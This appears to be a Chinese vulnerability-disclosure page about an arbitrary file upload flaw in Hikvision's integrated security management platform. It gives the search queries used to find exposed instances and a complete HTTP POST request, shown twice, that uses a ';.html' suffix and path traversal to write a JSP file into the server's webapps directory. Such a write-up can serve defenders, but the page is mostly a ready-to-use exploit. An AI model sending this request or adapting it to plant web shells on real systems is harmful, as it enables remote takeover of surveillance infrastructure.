HiKVISION 综合安防管理平台 files 任意文件上传漏洞

# HiKVISION 综合安防管理平台 files 任意文件上传漏洞 ## 漏洞描述 HiKVISION 综合安防管理平台 files 接口存在任意文件上传漏洞，攻击者通过漏洞可以上传任意文件 ## 漏洞影响 Hi...

HiKVISION 综合安防管理平台 files 任意文件上传漏洞
=================================

漏洞描述
----

HiKVISION 综合安防管理平台 files 接口存在任意文件上传漏洞，攻击者通过漏洞可以上传任意文件

漏洞影响
----

HiKVISION 综合安防管理平台

网络测绘
----

app="HIKVISION-综合安防管理平台"

web.title=="综合安防管理平台"

漏洞复现
----

登陆页面

![img](https://oss-yg-cztt.yun.qianxin.com/butian-public/f79264047ae3c2e43c5fbbd681d51537299655dc980b0.jpg)

需要开放运行管理中心 (8001端口)

![img](https://oss-yg-cztt.yun.qianxin.com/butian-public/f101316db17f81832d54efd0bf6a42233f563b2ec4056.jpg)

```plain
POST /center/api/files;.html HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a

------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip

<%out.print("test3");%>

------WebKitFormBoundary9PggsiM755PLa54a--
```

![img](https://oss-yg-cztt.yun.qianxin.com/butian-public/f647792e48ef30677d75c40620e3d04ed6c1e3abe6a98.jpg)

HiKVISION 综合安防管理平台 files 任意文件上传漏洞

漏洞描述

HiKVISION 综合安防管理平台 files 接口存在任意文件上传漏洞，攻击者通过漏洞可以上传任意文件

漏洞影响

HiKVISION 综合安防管理平台

网络测绘

app="HIKVISION-综合安防管理平台"

web.title=="综合安防管理平台"

漏洞复现

登陆页面

需要开放运行管理中心 (8001端口)

POST /center/api/files;.html HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a

------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip

<%out.print("test3");%>

------WebKitFormBoundary9PggsiM755PLa54a--

发表于 2024-07-12 18:49:34
阅读 ( 2317 )
分类：网络设备

站长统计